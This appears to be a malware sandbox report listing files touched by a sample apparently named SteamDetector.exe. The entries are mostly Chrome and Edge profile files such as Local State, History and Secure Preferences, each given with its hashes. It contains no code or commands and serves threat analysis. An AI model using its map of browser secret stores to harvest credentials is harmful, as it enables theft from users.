a7bdc800b16a13d70afb0dfc10ccb8cc94a5a8b850eb0ba0beaeeaaf5fcfbe6ccc7511248cc1fbba6527c65f89df3ad3fe7c5de047bad9e20daf7270005b65aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
78KB

MD5
21a2996cc3090a8123be0b9736b8755d

SHA1
9fa07547a8d6bb69fd3460eaf0c387977749d7a5

SHA256
21bf83732816dad392d3f95499a5916a2e0d77b122ae3c02f8db322277608c95

SHA512
af991ed31ef1d61067c78c7039c91fcfdd037eda52cd42107bc92f11708654f0b22c00f576d892e7138772d984426bd24df41c755a1ee9de190bb7f726384528

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
79KB

MD5
2245db707fb750b7ee1541cdf317a9f6

SHA1
2c40bc75641c578e75fe95a517a46777e4a7208e

SHA256
869c099d41bb29fa9423edf53ac4b771099819e927facb6487869d6891fed152

SHA512
af8bb4b17c34058490b9e5801228966758aab0e97c8a24dd6527a9383b81c7ecaddb04b96c53ecde0cc1c5778316271ee1e64c3ecb04a95b42bb28ca7074b371

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
79KB

MD5
32f909933fa2d690229bd0da354affa6

SHA1
ae59e2c0c57c1e72b8b76b8fea338ffb59ecfc2b

SHA256
288ac35d160d8312dff89cea5e1d5cd5e7ee7e98405de31e1e78b8c94d1f836d

SHA512
a67ec9ffc8f25060db64e1f46939d235fd0e3a2de39730f82ebcca9bc14cc53688684bb9d9bbb3db2e58546372320e08b471fe264f5f68ef2fc9ebb089d3bf80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\SteamDetector.exe.log

Filesize
319B

MD5
2a0834560ed3770fc33d7a42f8229722

SHA1
c8c85f989e7a216211cf9e4ce90b0cc95354aa53

SHA256
8aa2d836004258f1a1195dc4a96215b685aed0c46a261a2860625d424e9402b6

SHA512
c5b64d84e57eb8cc387b5feedf7719f1f7ae21f6197169f5f73bc86deddb538b9af3c9952c94c4f69ae956e1656d11ab7441c292d2d850a4d2aaa9ec678f8e82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
d45678bbeadea642cfa695e9b5ba0187

SHA1
110aea1d971eef7d0b3b3cbb0ca4b956b270a22a

SHA256
32c3314d87a8e2b17518763a3af8776225e7f72554fa04953c7b2f9d28f3e5ef

SHA512
a2b795a4200b2901d3e86c2d6e4731f6c65928c9917003949fd55d5ea216782242ec324cdc3b8e725bfdbb1b5d204e49dd91dbf5eec621d2720427eb82342a58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
fa5bc1297e8d76bd37a0a63bbbd70ed2

SHA1
5a2fe5a9d826e1b3d308e82101ddfb5e5d719abf

SHA256
fd6457360464b8c99b4cde26e09a25b1c27adc9b87063734da4206dad7007d22

SHA512
847db0ccfee4266a84e9ea35294350465f04768a81bf2ca9fd641291440d2d7c6e5e0daba9a36988aee0d5b5c931f789899be52b8fb6aa85f07418797859d3f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\16b944c4-be70-41a1-afc3-d56884f4ac30.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0

Filesize
44KB

MD5
7bd7721c9bad01f91575857958e21a1f

SHA1
4f75fe030219b262da555ba179ac8692706a51c7

SHA256
7c4abf361139ad6892347a12a86c120e99f02e30a514451f8887e11eaaf92a18

SHA512
b77f2ce69777158d15b2ae4f055942f37971d7138efaab1e4669176ad467bca654178ac8a8c2f659cb91bae25c7a52631613b30590965d65b81032e464853371

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1

Filesize
520KB

MD5
cc1811dc86058320c13248dedef25d6a

SHA1
1b14baee0a86f2dcfb6944c6e0b9cd3bb99863ea

SHA256
3318e2161adffdec35e30dc81243d2840a4b7d23afd0ee8e3a3a956e9998edea

SHA512
03aa6064ecaf95c4a7dea47e2ad3bb276f21bf61d7e04c3f7e271bfb20eb1263718c286703bff52dcddfc8b59ec66080f590a830876f1d6c5c7a1c9be5070fb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2

Filesize
1.0MB

MD5
ddcb30b4b259eba5c6381322a760e2c4

SHA1
62cfa524fa59c18030befa6cbc9c8e87aec04dcb

SHA256
b843c2beca641db68ba76e1cda6f7d21aa7275bd5c9e44285b74be5af9086dde

SHA512
ebb0c15edaa5a838f25903e834d2deae7c87414a3172c048fe670046f428f1e1a8ca48feb78d1cf79b714c657d4a241c86b34b86ebcf7d20d4b5c16702bfe51e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3

Filesize
12.0MB

MD5
5dfef72ca86edb81f27f92904f9af3dc

SHA1
a3340e6383426893c22aa8aad254984f0ee36d44

SHA256
5faed93520cac049d928fa9ffa4e794cb72824264036f4b2a6edbae666b84906

SHA512
07c25020c329a61f0f38950738681b0216f69bf4488565c51330439c07f4bbd0401c3170ce997f1436842f92721435bb3000bac3a5dda9f3de1875eee4a8d92b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008f

Filesize
34KB

MD5
04b4cc5e83e4b5c37284c177c7318c04

SHA1
8d141ed4a722185295059b98eef7dde112268ac2

SHA256
540ece2d4241326c93055dae883ec9c4d360cf56d24b62d3c3db31beafbe538b

SHA512
3f5d9a859a86911107152cc6a86a7e263189f84f788323a20cb7a65346b34c28732da3ba9c2d69ea13ebcc7cde67d0ca2f1be6535c332251cd3626b1c355e169

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000090

Filesize
100KB

MD5
f989b3df1da7e8451d64c0ffe01afd82

SHA1
6d40a628150a04b2ac77118d21aa0d9c390f9d8d

SHA256
b3dd5fa06cb6876e60aa8ca688701fb3d3632058904efeb7fc68ce8fe160aefe

SHA512
544d93570f305f9badc0ced4b257de50223769c779094e7d279d1270d8e409224a02eca6d2a887cad337371e43928cefaee10cb5c34bf43c6d1131364360a7da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000091

Filesize
114KB

MD5
e930cf00b9f1df58faff97bd4c06db59

SHA1
efd2155e9faadafe1558e1c5e5240e4f01db36f0

SHA256
a41c0edb4cecad4f7644eb7348e57331065814d38c5716962098990b320f4f0b

SHA512
d402f6493c039f2c59381ec6ded80acb410cb95834699b5900cfe305fc1cc9d59e4546d481d46c11f1e4eb7e5f10abf923790998eb2024cf22a3e3b4f5551308

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000092

Filesize
359KB

MD5
c659e7367ef7d6e3a7a8f1af3f081719

SHA1
24966f989863581ec11c5901903fcca55a22d86f

SHA256
6891eedd9f963af4db8d2cef70190fc8b8519ba40c67cafc67cd2bdf663575f2

SHA512
f42afe479be984ba441e1f06ce3fd17720daaf1384a2e270d7120bc8bc36bf33688cfc463429b0aba0ba5d5c18ad9cc08bb23cb1a77348e6ba3d5cffa8bbcb7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000093

Filesize
17KB

MD5
17a6d98b23a2c373af73eb085c3a22ad

SHA1
9505445ec0bb1f632f1b3fde44395f722f46a8a4

SHA256
ff6aa19e48ac7c61136eef8d50224ebf6cf03e315344bae24419cf7b26a9fcc6

SHA512
8453ca8630f92da9f5ccabda074e608aeda8e99171f98a20443ab38f0a6f41683ea33685a175af6cb6b0597d0163607b4a1c137291cd8c9cb128d0749b0a52ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000094

Filesize
19KB

MD5
d7ff50bfe3a911e6c398aade10cb733d

SHA1
6549bea7e8a6b3478100490bd836090c3387c3cb

SHA256
bb99ab2e6c435c1d5b5955da73027be6171b654afebaf8950dd68cb8b23f5bb4

SHA512
f33a9b155cac484342bd3ca53c2ba075d2c9e09f2340a11da803ebfa33c5336d9afa3d5507bccaf87c724f3043caf8cf88ee0c6d87ed5e0e1eb0acd19a77776d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000095

Filesize
77KB

MD5
3e2965715a0e4581141016e3e90f1956

SHA1
2a29a85b9280a07983b669bd55fb00210b016fde

SHA256
35f8e38cd29dc9670a87d303ded1ac66222237f08aceea49a886fbe1c509d2c1

SHA512
822075e34f9a429417adfb5930e6d22dbf395252311990020e576eecc3b013e02d181c9cb98e5266e88a8e9e65b2d988d79e01792020a36bbb0141a855ed4cd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000096

Filesize
58KB

MD5
8bc6b2c854f71c0312f05ed48e97308f

SHA1
f34cb8ea8c5ba53b49738692e7b6261850f67320

SHA256
42b5fa5a7ac9a39c054d3dba3d3ea38fc0667fea0d562f86a3d374037f1c7b13

SHA512
68ec350e547a0e78823771315ed50636a1d2415852b6c612775bedb0e91dde2665d97553452caa8cadc5251fb750e143a72e3f2b01dc6c8c4a4f2c8320c2b1be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000097

Filesize
165KB

MD5
06ea88dad2679667fe3a225e933505f0

SHA1
9ce4eab13f3c6154ac48c70e5c19d5536497f352

SHA256
78aaae0cdd974e17a111c702bf5bf6853035817a06950a526e407edb6f66b207

SHA512
a0bd2cc96c968ea40ed458fe8f9a33e9f594b2a266e5a02e0cdb22934e0630271ab7427d5d5020e98b54c99abc17b63341c529d572313412586861aaa6230506

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000098

Filesize
26KB

MD5
30a601af0f9bd1aa668db35bc945329d

SHA1
53046dcc67ea0559b3c5d26d6e384588e82c67c8

SHA256
1e4987038d24d8834ab7fe42193b3b4a93b62cdc081880b2e69f3eae726bb2cc

SHA512
3359c4546de3d69a11e8500820a05d5c54f21cbd39087406ce6fab71be5cc2d25c29d7bb5879b98b328ccb71cd5f45a32eee0f1cbbae13dc7384bc065817a8eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000099

Filesize
71KB

MD5
79e65beabd38357d5216e81dfcc050ec

SHA1
61fe97a329c65d8f2beef8f631e3446dddf0dc04

SHA256
70d87e3d798dee9330d4b075b2d313171e87ed93f51a298a568d62cdd1b58ac7

SHA512
060755d0608297400e6040ddb8d1531688db636d10d5de52f36ad44206b2e6d5af0526173d8d2a5c1b70b8e10c50e2769c6984eefa1c285ac5433902fb1783a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009a

Filesize
128KB

MD5
d3ad899ef6d314e078caf478e7a2c723

SHA1
cbda8ea1659223493a14d9f2e612e8da8f4690ac

SHA256
7a585b6bc904769860ba80499cd8bbe50f2f75f1db6a831ca6de4a85cc48b84d

SHA512
a8661b8acdc4596487a65bb4731bef9a496273d2ad60aa9cdcc18d728ed71677befb4d78c3a45ab9fb5f14e62b17a608934f36aebb0e4e6b5ed6a5053f5705bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009b

Filesize
128KB

MD5
971d4be2d9a0da7f5020a756a78f34ea

SHA1
492ebc493edfab603dd2c3a193275d41f4fbaab0

SHA256
7570185a90fa32b163f34e2c2808e85c2453b753a75dadc0c427ee21a14726a1

SHA512
65fa1c1499ba9814bf22e58d21e57794c89d3122a5532682eb43efada0bc4f996668edb80a42a0f8eb52c3d4006eda5f06e9a03045f7fb31ef11c2adcce1b781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009c

Filesize
71KB

MD5
8f850aaafc8da0df7f8f0a0b682a934b

SHA1
ef55df2e866abed76fe19b05ceb51c1147a6961f

SHA256
d40ca516a00f4b6ae9937cf0eaa8e1f0c2033aaf783dae3c461d68b8b142bc4e

SHA512
15160500824282d1e829908670dc7405abeb4d571ffdcf94532f55294fce77552c832f27fc14b91141ffd2aa142c441fd8e48df8e43cdbfe9283a043da2460dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009d

Filesize
128KB

MD5
e729e8699547cb5bfb4f424406b8f551

SHA1
5ab8f998ba9fc47a60c1af131c29bc9f6b656b53

SHA256
8b584c48779d727e3638c8922aa47b1413d8906130bd3c480dbe0774186d2915

SHA512
027438641482b3deb4c3ef779542f0ea5c1a97fa90a24523b645b9d53ff13e03da89a102f6edff4752d0a0b517cb131f3a8c7a4f54fe20f23ead8d357ad970bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009e

Filesize
67KB

MD5
5c9c51cdf7818044de18e75019fb268d

SHA1
43a8ce054dd42e7b76bbf20418bcad5dd579993d

SHA256
999556dcb1d4edbae3893e163430f8f7822020db52bcaba2a8f9428d93bd5310

SHA512
88ac0519957913c9663a6609fe2bf3fc0dbdc4af68bfef4d8a02294751ab9af7a3f88f0028a4b07d7f79be771069bd4d1c49115ab7c2dc5d13ee3f4a68f99d83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009f

Filesize
58KB

MD5
557c3215b8d09f848bd88c7626ec628a

SHA1
8564d0d5ef1f61cd1b4fcf5cce2464410fce0f47

SHA256
ac1e7c3cc85c914952c6b6878d4c56095f7068575f18e7bcedb0a91d3a198025

SHA512
79f140c407c94b188f34e9ed85992f1a5c12488f8d0557a677d8b61b2e19a65a234572195680ba3e9c0749455ed67c6b73303cdd66ffe000f6318d7f63adebce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a0

Filesize
64KB

MD5
0cdf3ed0f9e33c60eaab0dc63bd7faab

SHA1
20c5aadade28bab3a27743457140bffdeab3b3bc

SHA256
4fee7076cacf49b6e7b9da33cd6f61597b11d81461d92e5f2edd5affd0c01c99

SHA512
5ba3e530f61e7246e72cc2839324d7bc36339f080bef5e778d4ed2c1de29dc227e195dbe98c6bf77a224097dc8af111111cb9c12c204a471fa5f816e27082b21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
6KB

MD5
4d987f73ae9d68a76f6cffc9390008d5

SHA1
a61c72888b232a2d57e1062beda4ae8e95a3f71c

SHA256
0be3f20c804262f590cd977981a7930f2a4d3817d580070100778fb669a8ea96

SHA512
fbe0332e0639a127eea70bd4ae6c26e090ac9ab0a494c2969e7b15008fce8d5116d1b1c4ff512efe41553fbb08b4bd58a4b5ee329fca3eeacaba68644ce0d893

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57b3ee.TMP

Filesize
4KB

MD5
36d5392947455f6d5d9d9d855e2befbc

SHA1
f413f856e29625242c5e2e74e5c02d1839ff0c9b

SHA256
09eaaa82316f456cc20c5c006df00763d710b1f373dcb80c53227b301a9d765d

SHA512
b925c8f1c14bf1ab046da6f2e4843fa2aedb2d15d50bd6fa1a3dd4f021531b243dd49e1597e71c40656637a8d64d362f82e5b6149739aa4a8e013adb17cfca94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
322B

MD5
df24352f9c1e6bc715512f62e5aded16

SHA1
7c29ab57b5197d9e3b69e72650fae372c30da53a

SHA256
3e7e8163fca0af717fe6d5f69ac206f38fef05a72e6b5688743787fea9234c24

SHA512
bd9c550e49747f91cae8e50f6700efa7ea9fd9016213b33c1052570c4eca01cf4dceb23812f0cfca2505b35834f290c3f14079e15a0f1530d0bf253aa2c286e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
192KB

MD5
2ccb1dbbb647c7a4e37683b7f1b0c5b7

SHA1
131606055aa50e20fb8d5869bed3f23f31d92d88

SHA256
bf4b9bcadc3205ca098a7ec5da104781eaa8d5db92f524de89d30a961edde673

SHA512
7e6e5029058e9fc0dfb48252f43af04fe56daa64dfbfada35d4ee77f2dc8b247b5154eafed1fcbd8c5b666059a90fc15efae257e829977765c3512f74490ca33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
107KB

MD5
2b66d93c82a06797cdfd9df96a09e74a

SHA1
5f7eb526ee8a0c519b5d86c845fea8afd15b0c28

SHA256
d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954

SHA512
95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
90534af52589b0c3c0911649bb38183d

SHA1
ce47472a3af6b9869db67a7deae7b4a78ad139c8

SHA256
3d0ac3ec6450df4ed97a72748afb9904a78baf58d7edec81609ee3f4217eb99b

SHA512
d5e1fef6e9d7cd83225ff0537ce1360dd5a88fb36e10640ec8bf1ac2a6a9b9e1ceae44ff3890ba8b95f4d9ab8a23d7325ed2c0ecee165ff8dcab9e74a9b7e6ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
5e67d980e22dd2463e729621e017b9aa

SHA1
b749f77786c1acd00745838c006c9f20847ae4db

SHA256
2691ae700973ccf8e54c72992f4185b2e7a208e54cadf9f705bbb022c2a47e94

SHA512
a5680ec9cd17be731eff61747db702263b178cc40adeaeb54e7fabe34a17ac2cd463c595edf18b04777f1945a45be932126c24838178e6bcd5a7fe219a090091

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
e554f03c9c192bdc66bf4a64d9c32ad1

SHA1
ead8c9b53b090558a876eddd9a3882b166b34322

SHA256
38b16fac7bd7f580f4568d8d077f1cc46a0f7c642f61a97dc789cdc2eb312129

SHA512
6715a8439c8bb9cdd5b5c3106391d0918a7ca0ace4ac01e6d8b5437f4bf626ad459c33fe93737f06a486a728275c754c69e1b95a19d44f28746102f25152a92f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
15KB

MD5
0b3d0f5320cde14612b90b18efa73987

SHA1
dc2f79188b02cb5a1fcbf2600a25dfa3d4f5456d

SHA256
5f0e5d877a706835d829e9ee77676450fe05aed21ae34142d50570385a684ad5

SHA512
e02502542abca9b2512741dfa6ec9c89dbf573c22d7f9fe56f57ea0320a9efc061fc1770a4f8fbcffc225f95391abf099bf882ffcca27c0ead012c52462371a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
37KB

MD5
1aa8911fa5279533b8445c886bfbc7a7

SHA1
401fff1229958c8fd1f11d39ac786a243ef20641

SHA256
3ab060a56df62aee924669437eba3255c0bbdf42e81cb4773182a80a94e971fb

SHA512
587a39cd2718fb22c0b73aa862635b98c9961ab6e2ac1020775cd43d7e5c24e8c614dec2c0634e42689fe540a62bae9ee067db37dbae17bc23a5f72f741f790a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\3f0c425e-7f41-45c6-9020-bf2f638d7c26\index-dir\the-real-index

Filesize
72B

MD5
f8e10d7e352cc71c1b33a87ea036e11b

SHA1
6ab91e37cf4d3a04ae88074c66e46e22ab2d1424

SHA256
0c6393cb12bc9a746a62224e00f6f7230fae53dba8007fe2679e872ec261e280

SHA512
a9ae6e11aa4e7e2f2323933e232629c964ffb81f479283363bde44f89a7386d7069d7cdb5c5d8c12a133ce2969f3975329e84ca3ca7a60d36a11662fbc310179

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\3f0c425e-7f41-45c6-9020-bf2f638d7c26\index-dir\the-real-index

Filesize
72B

MD5
578e48cce61241788f6ef9a19d04281c

SHA1
5ecad8e120dfd377b1b0046ff9ee40a07afff081

SHA256
06b0e061a810f1e7e0ad121e1dbbcdf5743fafa03c2e36abb4063dc57787c64f

SHA512
1fb5b1ec7e33b724ceb3865bad44ca146ed094ca7b6bcba172de4ff4012b9788159beb5f96c3e495aa468bd39ccdece6226f77bee145b845466e3c90c69cea9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\a1055725-fae1-48c8-bdd9-38e1b5bb4dd9\index-dir\the-real-index

Filesize
2KB

MD5
b97cb9750a1adf6a6b7ea1448663c5d7

SHA1
7a891ab84fd47072471cd733ee77e53337a51cef

SHA256
c97338d8b18de7e87f6bb0100ce696112fa7b64cfbbe2822d79096900e5a4229

SHA512
d6d95807fb0af7e411bc21dfa20405ab4f3e0c1e248c8e8a473bc29b285b23a0744891cd52a2de1ec4b0b006c083204a88b12ba03e123b52449bef8fbc34f417

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\a1055725-fae1-48c8-bdd9-38e1b5bb4dd9\index-dir\the-real-index

Filesize
4KB

MD5
dd80a32a845175842abe9d8f89d0b226

SHA1
eb574798a7ab22515540a096658a1c0b319d181a

SHA256
2ab6ead78bbb76cc845a99bf0031f9143643fea4ffe9d048fcab08278b24141f

SHA512
dae7f3f09a2503197c827d8c968284305f45668fa908c7b5b62ad88b4985da0692d3da0b3d9c90d9355326d63d1d7f683c13b54a01bd0593879ec46d6b02846e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\a1055725-fae1-48c8-bdd9-38e1b5bb4dd9\index-dir\the-real-index~RFe57903a.TMP

Filesize
2KB

MD5
52f55bc5fb58c1e3b74f730f09ab4fe2

SHA1
a7af0cfcfa86139e07cc977a421a0ad33999b944

SHA256
266a9229d6273e31e07c8d8e5316fa0d8634de49764092c165ba69c0abe3795b

SHA512
11017bcefd4e1d7bb549fdab6402ed4511ff7e4963e781def5a2ae75d796857e201936ae2492d0fc74cbe72c79a2334978c35b8e50b969ae44c52e70cc53d653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
253B

MD5
7f733c89620afc644078995a425649a6

SHA1
21726c0a84b1b49e116bf0ad4c5fc16447cc1f1b

SHA256
63aa7b28b1855f92a8001174a84c09728d81ac92a499531fa18a84db7fc86af1

SHA512
c8a9acd0bbd8ddd311fdded2d9d88dfb3f64351474e1f721d91d62337b73a2721bddc292e9cb497c18f8061fd22677eac6fed8dcb17192943115041740b86627

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Filesize
422B

MD5
7f129fce5ca3ce0411d6720b34b30fd1

SHA1
f5dfce2d8a78deebe398c6315e1018dfa8c42d46

SHA256
2cd1bddf849cb99002388e492f4e5d21ca15b9916b14842085a4da59dd7a03c9

SHA512
6350a936121b35711dde6d6312519c62f63e087b5ffe235bd348e8d64d074605559d310b5c121d4e0e2b84afe34083616c172ee90dca566a67405c7029bcce30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Filesize
338B

MD5
fec5f0b0478d4e12943ce426a5a61c0b

SHA1
33748dbe06eeec73bf3b620059966785ba5c976b

SHA256
847cb98a614b863cf15c8836362601988e29a8b7184d89e8bf4227060ea4483a

SHA512
cceaaae3e567949af0d003e8f47828de6c0470c398630f31e58161e3b23a9f3d74f20f882994908708e7e0da2036623c862bdd432ae6f5a075243ce9ce0c0f15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
48B

MD5
a6573439cd5ad121e0c8519b955e1c61

SHA1
25faced148f54f28312306eac2b3ae1592729d4c

SHA256
6c5b9f221ae2757c35110b64084931a70cb105144c6bc21ecf015e0db8acc28e

SHA512
b777ee7363013bd51709c3e6de15f19ec73ba512d0fce78aaae9dfcb21b57def05b41e110edfb938606ed2ef2cd434d87079524fe2923c0a04497942de698f1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57b3a0.TMP

Filesize
48B

MD5
5042f6c453ef6f17df9eb93fb974ba05

SHA1
2bee35597abc8b1dfd8d9a8090ee3b2e12aca14b

SHA256
c6fbb8c0cc18ca148e68f94d2983581521574f56c34fff49f1b06f64ddfe7286

SHA512
5e5cdc13f6a29d61d6e212be0c71d42bf7648d150abfa54d5801f940549eb40f34609d24fdddb4babe266d8718fe4e2f40d3f9a46ed24393331208a0c01886bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

Filesize
112B

MD5
06543e45fb737504d2b6ceac070d76e5

SHA1
3177ff9345155cdfda1b17495d2c36fe27d4dd16

SHA256
cc4afd70e313d796d26f3f9de2c04b4bb0b741566a06279efac21fe957cdd8df

SHA512
828c40278fda92b3f6e16fbd5d395c95f21359d435bc61aac45a17c8ce087f58f79e5af6de7904f50381ab294482b3561e1f68e8fedb4d589e3118a042bc2c08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
350B

MD5
2987f58fcc87ad7f3aeb7421ff685f9f

SHA1
0dd693d23f1567ad8d1a43b51086b3b438bd25d2

SHA256
f66b28c0d44ab4b483ec6eb4d7b6d9003393c2593ee65a5f84ce8b28e34dab7e

SHA512
f0be4f66aa57304ee90fa7263df79e348716960c1a6259cf1f789696747228cec604608b550ff1a2c1a52ded76f5d2eef7ed74f82734e0883d67e756d9d09270

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
1fefffaaf5571bba67b0030368e0dc13

SHA1
63cc298cc9c26af380264d5dc33b1e5bf650be7d

SHA256
ec83a2ec437570649810febb50a97204d770958e4c88e955483bfdd321692e9f

SHA512
d62c711837ce7edac95e9fcc43ce1d55d4568b22325efa4c4deffdd8e63ab9f5ef2e328fb1a8e65b859b354ed8c455bb7ef1be98344a0854b6764666449f1021

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
22KB

MD5
497fc250ffc67724d6f287e26f0de7a1

SHA1
ced30bba3c37565dc241ccd5cf91938bf10718c9

SHA256
806ca329fd9e23077fdd5f6d635da48f733cca8015328cca6d7ae776b72619cb

SHA512
fa479b1574e1b99a596a2ec3b47eff5f0111273fddec3cd0405154d6eae11df41d9b46cf5b22d16a53ad8d5b63f55cf7b52d7890b0fe43d90b692100a46fe6a8

Download Submit
